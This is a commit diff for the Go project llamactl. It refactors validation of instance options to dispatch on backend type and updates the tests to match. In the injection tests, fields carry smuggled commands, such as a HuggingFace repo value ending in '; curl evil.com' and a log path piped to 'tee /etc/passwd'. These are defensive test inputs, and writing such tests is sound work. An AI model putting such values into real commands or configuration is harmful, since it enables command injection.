Refactor instance management to support backend types and options

2025-09-01 21:59:18 +02:00
parent 9a4dafeee8
commit d9542ba117
13 changed files with 427 additions and 254 deletions
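
The hunks below imply a reshaped CreateInstanceOptions: an explicit BackendType field plus a pointer to the llama.cpp-specific options, so the field can stay nil for other backends. A minimal sketch of that implied shape — field names are taken from the diff; the backends.BackendType type name, field ordering, and everything else here are assumptions, not the actual definition:

package instance

import (
	"llamactl/pkg/backends"
	"llamactl/pkg/backends/llamacpp"
)

// Sketch only: inferred from the hunks in this commit, not the real file.
type CreateInstanceOptions struct {
	AutoRestart  *bool // pointer fields seen in the tests via testutil.BoolPtr/IntPtr
	MaxRestarts  *int
	RestartDelay *int

	// New in this commit: selects which backend the remaining options apply to.
	BackendType backends.BackendType

	// Now a pointer, so it can be nil when BackendType is not llama.cpp.
	LlamaServerOptions *llamacpp.LlamaServerOptions
}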

pkg/validation/validation.go

@@ -2,6 +2,7 @@ package validation

 import (
 	"fmt"
+	"llamactl/pkg/backends"
 	"llamactl/pkg/instance"
 	"reflect"
 	"regexp"
@@ -33,20 +34,35 @@ func validateStringForInjection(value string) error {
 	return nil
 }

-// ValidateInstanceOptions performs minimal security validation
+// ValidateInstanceOptions performs validation based on backend type
 func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
 	if options == nil {
 		return ValidationError(fmt.Errorf("options cannot be nil"))
 	}

+	// Validate based on backend type
+	switch options.BackendType {
+	case backends.BackendTypeLlamaCpp:
+		return validateLlamaCppOptions(options)
+	default:
+		return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
+	}
+}
+
+// validateLlamaCppOptions validates llama.cpp specific options
+func validateLlamaCppOptions(options *instance.CreateInstanceOptions) error {
+	if options.LlamaServerOptions == nil {
+		return ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
+	}
+
 	// Use reflection to check all string fields for injection patterns
-	if err := validateStructStrings(&options.LlamaServerOptions, ""); err != nil {
+	if err := validateStructStrings(options.LlamaServerOptions, ""); err != nil {
 		return err
 	}

-	// Basic network validation - only check for reasonable ranges
-	if options.Port < 0 || options.Port > 65535 {
-		return ValidationError(fmt.Errorf("invalid port range"))
+	// Basic network validation for port
+	if options.LlamaServerOptions.Port < 0 || options.LlamaServerOptions.Port > 65535 {
+		return ValidationError(fmt.Errorf("invalid port range: %d", options.LlamaServerOptions.Port))
 	}

 	return nil
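
Note that validateStructStrings now receives options.LlamaServerOptions directly (it is already a pointer), which is why the nil check above must run first. A hedged usage sketch of the new entry point — the identifiers come from this commit, but the test name, model path, and the assumption that BackendType is a string-based type are mine:

package validation_test

import (
	"testing"

	"llamactl/pkg/backends"
	"llamactl/pkg/backends/llamacpp"
	"llamactl/pkg/instance"
	"llamactl/pkg/validation"
)

// Usage sketch: callers now select the backend explicitly and pass
// backend-specific options as a pointer.
func TestValidateLlamaCppBackend(t *testing.T) {
	options := &instance.CreateInstanceOptions{
		BackendType: backends.BackendTypeLlamaCpp,
		LlamaServerOptions: &llamacpp.LlamaServerOptions{
			Model: "/models/example.gguf", // hypothetical path
			Port:  8080,
		},
	}
	if err := validation.ValidateInstanceOptions(options); err != nil {
		t.Fatalf("expected options to validate, got: %v", err)
	}

	// A backend type the switch does not know is rejected up front
	// (assumes BackendType is a string-based type, per the %s verb above).
	bad := &instance.CreateInstanceOptions{BackendType: "no-such-backend"}
	if err := validation.ValidateInstanceOptions(bad); err == nil {
		t.Fatal("expected unsupported backend type error")
	}
}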

pkg/validation/validation_test.go

@@ -1,6 +1,7 @@
 package validation_test

 import (
+	"llamactl/pkg/backends"
 	"llamactl/pkg/backends/llamacpp"
 	"llamactl/pkg/instance"
 	"llamactl/pkg/testutil"
@@ -83,7 +84,8 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			options := &instance.CreateInstanceOptions{
-				LlamaServerOptions: llamacpp.LlamaServerOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Port: tt.port,
 				},
 			}
@@ -136,7 +138,8 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
 		t.Run(tt.name, func(t *testing.T) {
 			// Test with Model field (string field)
 			options := &instance.CreateInstanceOptions{
-				LlamaServerOptions: llamacpp.LlamaServerOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Model: tt.value,
 				},
 			}
@@ -173,7 +176,8 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
 		t.Run(tt.name, func(t *testing.T) {
 			// Test with Lora field (array field)
 			options := &instance.CreateInstanceOptions{
-				LlamaServerOptions: llamacpp.LlamaServerOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Lora: tt.array,
 				},
 			}
@@ -196,7 +200,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 		{
 			name: "injection in model field",
 			options: &instance.CreateInstanceOptions{
-				LlamaServerOptions: llamacpp.LlamaServerOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Model:  "safe.gguf",
 					HFRepo: "microsoft/model; curl evil.com",
 				},
@@ -206,7 +211,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 		{
 			name: "injection in log file",
 			options: &instance.CreateInstanceOptions{
-				LlamaServerOptions: llamacpp.LlamaServerOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Model:   "safe.gguf",
 					LogFile: "/tmp/log.txt | tee /etc/passwd",
 				},
@@ -216,7 +222,8 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
 		{
 			name: "all safe fields",
 			options: &instance.CreateInstanceOptions{
-				LlamaServerOptions: llamacpp.LlamaServerOptions{
+				BackendType: backends.BackendTypeLlamaCpp,
+				LlamaServerOptions: &llamacpp.LlamaServerOptions{
 					Model:   "/path/to/model.gguf",
 					HFRepo:  "microsoft/DialoGPT-medium",
 					LogFile: "/tmp/llama.log",
@@ -244,7 +251,8 @@ func TestValidateInstanceOptions_NonStringFields(t *testing.T) {
 		AutoRestart:  testutil.BoolPtr(true),
 		MaxRestarts:  testutil.IntPtr(5),
 		RestartDelay: testutil.IntPtr(10),
-		LlamaServerOptions: llamacpp.LlamaServerOptions{
+		BackendType: backends.BackendTypeLlamaCpp,
+		LlamaServerOptions: &llamacpp.LlamaServerOptions{
 			Port:      8080,
 			GPULayers: 32,
 			CtxSize:   4096,
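
The switch in ValidateInstanceOptions is the seam for future backends: each backend type gets its own validate helper plus a nil check on its own options pointer. A hypothetical sketch of how a second backend would slot in — BackendTypeMLX, MLXServerOptions, and validateMLXOptions are invented names, not part of this commit:

// Hypothetical extension of the dispatch added in this commit.
// None of the MLX identifiers below exist in the codebase.
func ValidateInstanceOptions(options *instance.CreateInstanceOptions) error {
	if options == nil {
		return ValidationError(fmt.Errorf("options cannot be nil"))
	}

	switch options.BackendType {
	case backends.BackendTypeLlamaCpp:
		return validateLlamaCppOptions(options)
	case backends.BackendTypeMLX: // invented constant
		return validateMLXOptions(options) // invented helper, same nil-check-then-validate pattern
	default:
		return ValidationError(fmt.Errorf("unsupported backend type: %s", options.BackendType))
	}
}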